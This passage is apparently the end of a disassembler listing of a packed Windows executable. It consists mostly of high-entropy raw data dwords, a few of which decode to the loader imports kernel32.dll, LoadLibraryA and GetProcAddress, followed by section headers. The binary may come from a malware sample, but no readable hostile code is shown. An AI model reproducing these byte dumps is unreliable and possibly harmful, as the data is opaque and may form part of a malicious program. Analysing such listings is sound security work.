dd 0A6247654h, 7C054386h, 0FEE64084h, 94BCFE86h, 0D83A4757h
dd 738A35A6h, 3263B88Eh, 0EB26E2A7h, 4A369A08h, 0AED0C1F0h
dd 11973B7Ch, 0A4D63D8Eh, 37911DDAh, 7382F95h, 0A9BD09F5h
dd 0E789F3F4h, 0D090BBFCh, 0AAD2E69h, 0A04DA816h, 5B25CAA6h
dd 66D75F5Dh, 52E51D37h, 0FD03CC32h, 5BF71C0Ch, 4CBB4DF2h
dd 3A09DE94h, 0E1879B47h, 2E0F51CAh, 0D4B821CDh, 5890C421h
dd 0A37911ECh, 2EB798BEh, 14DA26F1h, 0C3161283h, 6634D086h
dd 19E93011h, 0C4339F26h, 3323C898h, 4E3AA680h, 29F98ED7h
dd 862F15D2h, 980C23C7h, 49D7A286h, 7368CACBh, 4D85C097h
dd 0BC3DCC30h, 0DED0DBD6h, 11F9918h, 0F679C124h, 0C58E01CDh
dd 0BB84C480h, 25913A0Ah, 4B0118CAh, 0CBBA9038h, 41434061h
dd 4F1FF006h, 16A19F2Fh, 0F7DE240Fh, 1B0CD5DFh, 39A90E87h
dd 0CBC5291Eh, 0C20B18DAh, 6C879098h, 0DE14DB3Eh, 1C4CD194h
dd 0FBC68A3Ah, 0D7943679h, 529822C7h, 0A6244BEEh, 0C2AC6F7Ah
dd 944A306Ch, 332262EFh, 85F68018h, 15332242h, 5688C291h
dd 42A69982h, 9DD0D3D4h, 0E8C0E7FDh, 0CF40E74Ah, 0D4B62DA6h
dd 28D2D614h, 0DC2E1459h, 101CA214h, 0D09DCCDAh, 3BBAC432h
dd 0C3003C29h, 4CBE73F7h, 9C7B4C33h, 0BBC640BAh, 0B6E243E2h
dd 889F80A9h, 0A432BA0Eh, 53044B3h, 5F4992A6h, 0DA6B0518h
dd 20921126h, 996822A4h, 0E83B2D1Ah, 0F93B2E4Dh, 2CBC21F9h
dd 8BA02FC2h, 5C05CC0Eh, 0E63A3799h, 977E2757h, 0F652E396h
dd 24947879h, 829064A1h, 4514C2A2h, 0A273FCC8h, 8F6251D9h
dd 14CB37F9h, 38F42510h, 0A68CFCC8h, 522565F6h, 0A6C64ADEh
dd 3E8625E6h, 728B4A87h, 90324925h, 0A6F4247Bh, 134D39BDh
dd 4AB49D86h, 9867C256h, 0AE51B8BAh, 0AE2E15A4h, 0BA3DF580h
dd 988EA4A8h, 69724AD9h, 889972A8h, 4ECA028Bh, 300F2E1Fh
dd 274DC082h, 0E25F0F24h, 5CC69D59h, 0F4B41175h, 5623209Fh
dd 2A76C4D4h, 5623CA22h, 4C714FD4h, 0BA1444A2h, 0F2CBE04Fh
dd 3CD9D613h, 9E9FC2F4h, 0D17646EDh, 0CB421244h, 0DF21B98Ah
dd 17D6BA90h, 0A8364F21h, 0A76F090Ah, 1F3EEA01h, 4D806026h
dd 0ECD2837h, 0C8A0F5Bh, 7E0E0629h, 0CB082DCAh, 43E9470Bh
dd 4521201Dh, 400E0648h, 0B800C6C8h, 3C3F4FEBh, 0B583E9Eh
dd 0F45D4A4h, 3995C601h, 1FB9813Dh, 0AF0C4E27h, 0F7242268h
dd 0CB9A8126h, 0B413BC72h, 2C11C5Dh, 92FD35F5h, 0D1B81E8Ch
dd 74104D64h, 58B4B618h, 12FB522Fh, 9BF5883Eh, 6D582DBCh
dd 405A164Ah, 0D0B83211h, 84EF54CFh, 9161179Eh, 4114C639h
dd 0BC3A6002h, 45362C5Eh, 28024B5Fh, 0F2A46D67h, 0FD45E490h
dd 40C92047h, 0FFCC22A3h, 20A28B28h, 5F51706Ah, 786C206Dh
dd 29A3222Eh, 0B7FE6427h, 0C13B3E46h, 62023693h, 359B9EFDh
dd 17122231h, 0A60130BAh, 0C5F53266h, 6BCF345h, 4AD11990h
dd 22A81989h, 2852C42Ch, 0A026AFC2h, 56593E4h, 0F476B2BBh
dd 0E5309D9Eh, 0FB4A4408h, 0BA3448BAh, 0F58148F7h, 0CD95B00Dh
dd 8273AB42h, 0A2524619h, 8F53F620h, 0A4704006h, 272699C3h
dd 22A93F15h, 0DBEFA3AFh, 8C7CE0B6h, 2CF6FA86h, 39B0CC96h
dd 2510BB86h, 2C80EA54h, 87C209E5h, 929ECF88h, 2672600Eh
dd 276FC94Ah, 0D75A766Bh, 235C53CEh, 0DEB12A48h, 0C0C468CCh
dd 0F14EC6B3h, 0D9BB16F4h, 0A326B489h, 2B36FD6h, 0D1CE6510h
dd 0B5847216h, 425B3291h, 0AAD2D37Fh, 0C6E84E2Dh, 59DC9818h
dd 0C717FB1Dh, 6EB0B88h, 0DD9F9611h, 0A5155C2Eh, 0AB963F90h
dd 92781946h, 0A95E9269h, 0BD800714h, 4FD3B838h, 0B312BB39h
dd 0F9499AE6h, 2123B109h, 3E1CC30Ch, 0F820F58Fh, 8912D7AAh
dd 3E5E4D6Bh, 45535216h, 473E007Ch, 3291CB33h, 163E6152h
dd 0AACE0409h, 67A64521h, 0C99E4BFEh, 8B62166Dh, 0F6A1A1D2h
dd 1E9373CDh, 0DE1328E6h, 9E2D4991h, 473C15D2h, 928F5EB3h
dd 4278294Eh, 0F47A98CFh
dd 0BB256890h, 0B4D84C1Ch, 0DF63AFBDh, 8B373E36h, 5D995B77h
dd 9342920h, 0D478E8BAh, 27DB2E41h, 0F4412A0Fh, 56478BA6h
dd 0B92FF09Dh, 269A9483h, 368ABB89h, 2CC5AD9Ah, 11EDF83Bh
dd 0A02942DBh, 28A8FB29h, 4BC1182Dh, 0CD25355Bh, 98D095F5h
dd 80925F20h, 6098948Eh, 0B14E39A3h, 4CC8C8C7h, 0D14483ADh
dd 0FD32D4Dh, 9787CC9Ah, 0A94975F2h, 45A80F61h, 3948B289h
dd 1B0AC96h, 43C2F582h, 270FD0FAh, 793CCA7Bh, 45D29F0Eh
dd 3EB641AFh, 452D4DEDh, 0B0DE512h, 321996D3h, 0C8649236h
dd 32330CB2h, 775F8812h, 1AB3111Eh, 374DE93Ah, 30DA2AF3h
dd 0F3F3F4BAh, 0A33A7F64h, 0D728200Ah, 89792443h, 81A0182Eh
dd 24E60D18h, 374F2002h, 0F17CA45h, 0BD0AA015h, 0EC3E9F19h
dd 0D98369Bh, 4EF69180h, 8ED8EA3Fh, 0C0B81C4Bh, 4AFFCA44h
dd 632BBC0Eh, 41C1B1F2h, 0C308405Fh, 0C4F8CABAh, 864BB74h
dd 19C0EE36h, 0B712BC04h, 2698B710h, 62202E25h, 0BF5F41DEh
dd 4D47149Ah, 0A8095652h, 0D8C2B931h, 5119B7CAh, 0B2CE4597h
dd 0CF92745Fh, 0BFC47E55h, 0F3CA4238h, 4445BC16h, 98D80A06h
dd 3215B20Ch, 57022BA9h, 0A60130FEh, 633DD412h, 830FEB1h
dd 312B41BCh, 569759D2h, 0D6942979h, 554D4611h, 0FA924DA3h
dd 76612157h, 0BC24D552h, 4B981206h, 23D0B07h, 0B146D561h
dd 0B61A0E1Fh, 0A643160Ch, 0C4961210h, 2A33822Eh, 0FE2631E4h
dd 0EA43220Ch, 0C4D63E10h, 3631C63Ah, 0BAF59E32h, 558743D7h
dd 901FC635h, 91B33F52h, 2EA9DF24h, 10C939B9h, 0A14C2625h
dd 38902495h, 29F2DDCDh, 7F533629h, 0A8E60CB4h, 7F673225h
dd 103EC6BEh, 3532A2C2h, 3A2D9A97h, 89435D10h, 6B3C92CAh
dd 0DACE5F62h, 3C0FCF52h, 0DCF4B090h, 6BD626F9h, 0BEF9F123h
dd 2FCE3D08h, 0EDBFEB0Fh, 0BA0531E0h, 4612C04Eh, 71DA0303h
dd 9FB2A08Eh, 22252B1Eh, 93BEAE43h, 31775799h, 0E693F7D9h
dd 246448E2h, 0C8A1229Fh, 10A3F198h, 0F7834109h, 0DB0EF09Ch
dd 6299D64Eh, 98DA49CEh, 0B3C69C60h, 0CA9D1582h, 0C934E22Ah
dd 0A4598213h, 80834CB5h, 326DED25h, 1AD91728h, 7B8AF562h
dd 0CB25F10Bh, 2178DF7Ch, 0E7E2A7D8h, 2B627A99h, 0B9421489h
dd 0C8DF14Fh, 26CC1293h, 0B3D9CB95h, 5E7A1022h, 0F989D3DEh
dd 0E8635F6Bh, 4249EDFBh, 8472136Bh, 0D25AF9F6h, 9D9F2370h
dd 4EAE9D9Bh, 0B316A6C6h, 8AC63ECAh, 35F53641h, 0DED21920h
dd 0CAFB8AB7h, 0EDA641B2h, 0EB0B7580h, 79C7234Fh, 0D465AFE9h
dd 32F31626h, 1E3772E2h, 0B37C6971h, 19BAD218h, 0F5261945h
dd 562C7425h, 2684AC9Ch, 0F5652084h, 3983D63Eh, 1225E99Bh
dd 22193192h, 382C7077h, 960D8A0Ah, 64720870h, 0F17314A1h
dd 103E44CFh, 4829ED69h, 0EBA48F73h, 4F0B697Eh, 6026D151h
dd 0CC234DE6h, 18ED68B6h, 0EE9512Dh, 8306857Bh, 0FA6013B7h
dd 250DA445h, 0BF8823FDh, 0B0DE0E93h, 0EEE237F4h, 4E0AF71Ch
dd 0D884B0D4h, 1E13AFEDh, 0C72B7C9h, 76A2F58Bh, 940B5FB2h
dd 4F9AED91h, 44FB11C2h, 0A6990B0Ah, 8CBD2FEh, 0F7DEEBBh
dd 16149AA4h, 22D511F5h, 0A6A88068h, 0A84697DEh, 0F5E0AF8Bh
dd 0E014BA21h, 2510C6A6h, 6231E49Bh, 0D5323CD6h, 0DF3F0E93h
dd 0C2A413DAh, 48CA7148h, 259B8736h, 0D5228206h, 7B243EB3h
dd 0C2915BFDh, 0A457F315h, 0D6D2BB1Ah, 0C9CCAD06h, 1CDF3486h
dd 0B33AE861h, 2E480A84h, 149D2908h, 0A5A3A721h, 0C9924BC2h
dd 0D145937Dh, 834561F9h, 97CB26D4h, 5C9963C4h, 1AC60A42h
dd 0B5CCB04Ah, 2EEBA69Ch, 5E8FBA38h, 0B116B445h, 64472107h
dd 5FBE765Ch, 3DDEBBA8h, 721E98A6h, 39AD6425h, 0AB55261Ah
dd 0C7A3492Eh, 164F9764h, 8EA6E260h, 5A68BCD2h, 0AF241109h
dd 0FDA796CDh, 0DB2D10B8h, 0FE154456h, 4730D44Dh, 0F0C90822h
dd 36DC985Ah, 86A4049Eh, 0E4D12EA6h, 0ABC718D4h, 56996C4Ah
dd 2641E991h, 0A5466A76h, 18124BA8h, 0AFFCDBBh, 10C793F6h
dd 0B2BF4FC9h, 0AE311FF2h, 8839F2CAh, 8EEEE6EDh, 17593B26h
dd 9A223B5Eh, 0E1168A52h, 10602DB2h, 4284CF5Fh, 0D0821934h
dd 26F10959h, 0ECF0199Eh, 71343CDEh, 2583FC41h, 4B5CC832h
dd 4F2E9739h, 45CAA2CAh, 6F544846h, 0FF82A0A2h, 0C6AB6A1Bh
dd 16A6A943h, 3756D8BBh, 0AB9D80E4h, 264012FFh, 25623173h
dd 0C6EC42E6h, 21235865h, 0F5565244h, 450A7889h, 5C4D3899h
dd 0F1DEB2D1h, 0FD83254Dh, 327A4EA6h, 39F73290h, 0C2286510h
dd 0DECA9BB1h, 8D324B57h, 45AC97C4h, 0EB6AB6B4h, 6276D125h
dd 98DE9FDEh, 81CAC216h, 8CCABB15h, 984AD433h, 699D0327h
dd 0E7BCD68Dh, 92469EDCh, 8C084E78h, 0EBFE0291h, 0C61BE6Ch
dd 21DE423Eh, 602A9126h, 405B0400h, 10384400h, 454B0740h
dd 4C304E52h, 382E3233h, 1F06C64h, 69725780h, 0D4506574h
dd 73EA636Fh, 6DF24DE2h, 8E79FDF1h, 0C0695628h, 6C617574h
dd 2E40D841h, 20CF7845h, 0AF70AF44h, 50614C69h, 0DD6EE848h
dd 0AD23B76Ah, 461C8C0Ch, 0CC410C69h, 734C431Ah, 57781AAEh
dd 8A469ECCh, 67FDED53h, 624F1E87h, 0FC63476Ah, 5AD0472Ah
dd 64411C62h, 20CD6C7Bh, 0F761F84Ch, 0FB6269D0h, 40DA41DBh
dd 54B72AB1h, 640F9568h, 75431E2Ch, 0BD6E18F3h, 1F491223h
dd 7D736C29h, 726E9CE5h, 0A8A8522Ch, 0A22A7B32h, 6C28A067h
dd 767DCC44h, 0FB58536Ch, 0A05BD073h, 9D0D9441h, 0F04E0B08h
dd 0B3745778h, 88A0F41h, 0CC107372h, 0A8CA5487h, 4E0F0E70h
dd 66121561h, 6FA26270h, 0CB5C446h, 1ADA0E94h, 5D701085h
dd 76B7B9EBh, 6D0AFF7Eh, 4A70A1A7h, 2115AB4Bh, 525E48A8h
dd 68BAD33Ah, 5F571325h, 5A779F84h, 24AF9044h, 5F0A3132h
dd 3888EA6Ch, 8EB8A209h, 49378648h, 0E89E0A41h, 80B38EA9h
dd 12436BF4h, 636E756Fh, 64D34D62h, 0C387DEDEh, 70142CA2h
dd 8F2D6E79h, 81E3A53h, 53716EE3h, 0FDFFB3FEh, 7562C146h
dd 6A60833Ah, 52D7629Eh, 334D7B26h, 3F427852h, 0A345C04Ch
dd 777A6DC7h, 5570C544h, 54733115h, 328AF679h, 0E2523E1Bh
dd 0F803FFCCh, 55266D9Ah, 6B246E53h, 90684350h, 705537F1h
dd 823A5956h, 6C7F02B3h, 0D5EA1091h, 0FC6A46C8h, 2E33A648h
dd 61191E4Dh, 0E8376967h, 0F1344D35h, 4612A875h, 7D847049h
dd 77016641h, 57001118h, 5F423253h, 0FB411899h, 5A6B9E36h
dd 0B03CC3Eh, 33890A09h, 0C241612h, 12910348h, 11440522h
dd 1202890Fh, 14012872h, 49204401h, 0E6C7428h, 8090E64h
dd 9911348h, 14440722h, 857DA396h, 4441F443h, 49509956h
dd 20217F59h, 0B43EF607h, 403148F5h, 0C89A43D3h, 0AE0A83A2h
dd 68243E59h, 0BE4F6707h, 43536EE1h, 1252314Dh, 4CC572DFh
dd 6DA62D21h, 9A151AF2h, 4C0C1BB7h, 4D49A7B5h, 67360F4Ch
dd 725244A8h, 913CD065h, 16683252h, 8F3EB267h, 0FF668EDFh
dd 3B6FE8A4h, 0BA6CEA4Ch, 19EDB255h, 5354410Fh, 0EA4B8B33h
dd 0EB0DAC79h, 7E03B056h, 86AD9075h, 7F308B1Dh, 2691AE3Dh
dd 0BFFD7563h, 6FBE4932h, 32897397h, 85093C41h, 290E23FBh
dd 12F0113Bh, 6A02534Dh, 4C4B434Fh, 7254303Ah, 696D7390h
dd 22A2A699h, 5012E442h, 4ED77252h, 0BDD7D24Bh, 0D369C6C1h
dd 0C80EB469h, 65431523h, 696CA66Ch, 8018h, 4000000h, 6B00405Bh
dd 656E7265h, 2E32336Ch, 6C6C64h, 64616F4Ch, 7262694Ch
dd 41797261h
dd 74654700h, 636F7250h, 72646441h, 737365h
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
db 0Ch, 60h, 0
dd 2 dup(0)
dd 800300h, 600C00h, 783h dup(0)
db 2 dup(0)
__u_____ ends
; Section 3. (virtual address 0000A000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40A000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start